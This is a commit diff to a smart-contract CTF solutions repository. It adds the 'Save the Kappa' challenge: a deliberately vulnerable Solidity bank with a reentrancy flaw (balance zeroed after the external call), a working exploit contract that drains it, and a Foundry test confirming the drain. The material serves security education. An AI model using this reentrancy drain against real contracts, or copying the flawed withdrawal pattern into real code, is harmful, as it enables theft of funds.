add full weak engineer ctf

Author: minaminao

README.md

@@ -99,6 +99,7 @@ Please be aware that these contain spoilers. For contribution guidelines, please
 
 | CTF Name                                                                                                                   | Event Month          |
 | -------------------------------------------------------------------------------------------------------------------------- | -------------------- |
+| [Full Weak Engineer CTF](src/FullWeakEngineerCTF/)                                                                         | 2025-08              |
 | [HITCON CTF 2025](https://github.com/minaminao/my-ctf-challenges/tree/main/ctfs/hitcon-ctf-2025/maximal-extractable-vuln)  | 2025-08              |
 | [SekaiCTF 2025](https://github.com/project-sekai-ctf) 🔗                                                                    | 2025-08              |
 | [justCTF 2025](https://github.com/justcatthefish) 🔗                                                                        | 2025-08              |
@@ -438,6 +439,7 @@ Note:
 | [SEETF 2023: PigeonBank](src/SEETF2023/)                                        |                            |
 | [SekaiCTF 2023: Re-Remix](src/ProjectSekaiCTF2023/)                             | Read-Only Reentrancy       |
 | [SECCON Beginners CTF 2024: vote4b](src/SECCONBeginnersCTF2024/vote4b/)         | ERC721, `_safeMint()`      |
+| [Full Weak Engineer CTF: Save the Kappa](src/FullWeakEngineerCTF/SaveTheKappa/) |                            |
 
 ### Flash loan basics
 - Flash loans are uncollateralized loans that allow the borrowing of an asset, as long as the borrowed assets are returned before the end of the transaction. The borrower can deal with the borrowed assets any way they want within the transaction.

src/FullWeakEngineerCTF/SaveTheKappa/Exploit.sol

@@ -0,0 +1,31 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.20;
+
+import {VulnerableBank} from "./challenge/VulnerableBank.sol";
+
+contract Exploit {
+    VulnerableBank bank;
+    uint256 step = 0;
+
+    function exploit(address payable bankAddr) external payable {
+        bank = VulnerableBank(bankAddr);
+        for (uint256 i = 0; i < 20; i++) {
+            uint256 value =
+                address(bank).balance < address(this).balance ? address(bank).balance : address(this).balance;
+            if (value == 0) {
+                break;
+            }
+            bank.deposit{value: value}();
+            bank.withdrawAll();
+        }
+    }
+
+    receive() external payable {
+        if (step == 0) {
+            step = 1;
+            bank.withdrawAll();
+        } else {
+            step = 0;
+        }
+    }
+}

src/FullWeakEngineerCTF/SaveTheKappa/Exploit.t.sol

@@ -0,0 +1,27 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.20;
+
+import {Test, console} from "forge-std/Test.sol";
+import {Exploit} from "./Exploit.sol";
+import {Setup} from "./challenge/Setup.sol";
+
+contract ExploitTest is Test {
+    address playerAddr = makeAddr("player");
+    Setup setup;
+
+    function setUp() public {
+        vm.deal(playerAddr, 1 ether);
+        setup = new Setup{value: 10 ether}();
+    }
+
+    function test() public {
+        vm.startPrank(playerAddr, playerAddr);
+
+        Exploit exploit = new Exploit();
+        exploit.exploit{value: 1 ether}(payable(setup.getBank()));
+
+        assert(setup.isSolved());
+
+        vm.stopPrank();
+    }
+}

src/FullWeakEngineerCTF/SaveTheKappa/README.md

@@ -0,0 +1 @@
+https://github.com/full-weak-engineer/FWE_CTF_2025_public

src/FullWeakEngineerCTF/SaveTheKappa/challenge/Setup.sol

@@ -0,0 +1,25 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.26;
+
+import "./VulnerableBank.sol";
+
+contract Setup {
+    VulnerableBank public immutable bank;
+
+    constructor() payable {
+        VulnerableBank _b = new VulnerableBank();
+        if (msg.value > 0) {
+            (bool ok,) = address(_b).call{value: msg.value}("");
+            require(ok, "seed failed");
+        }
+        bank = _b;
+    }
+
+    function getBank() external view returns (address) {
+        return address(bank);
+    }
+
+    function isSolved() external view returns (bool) {
+        return address(bank).balance == 0;
+    }
+}

src/FullWeakEngineerCTF/SaveTheKappa/challenge/VulnerableBank.sol

@@ -0,0 +1,23 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.26;
+
+contract VulnerableBank {
+    mapping(address => uint256) public balances;
+
+    function deposit() external payable {
+        require(msg.value > 0, "no value");
+        balances[msg.sender] += msg.value;
+    }
+
+    function withdrawAll() external {
+        uint256 bal = balances[msg.sender];
+        require(bal > 0, "no balance");
+
+        (bool ok,) = msg.sender.call{value: bal}("");
+        require(ok, "send failed");
+
+        balances[msg.sender] = 0;
+    }
+
+    receive() external payable {}
+}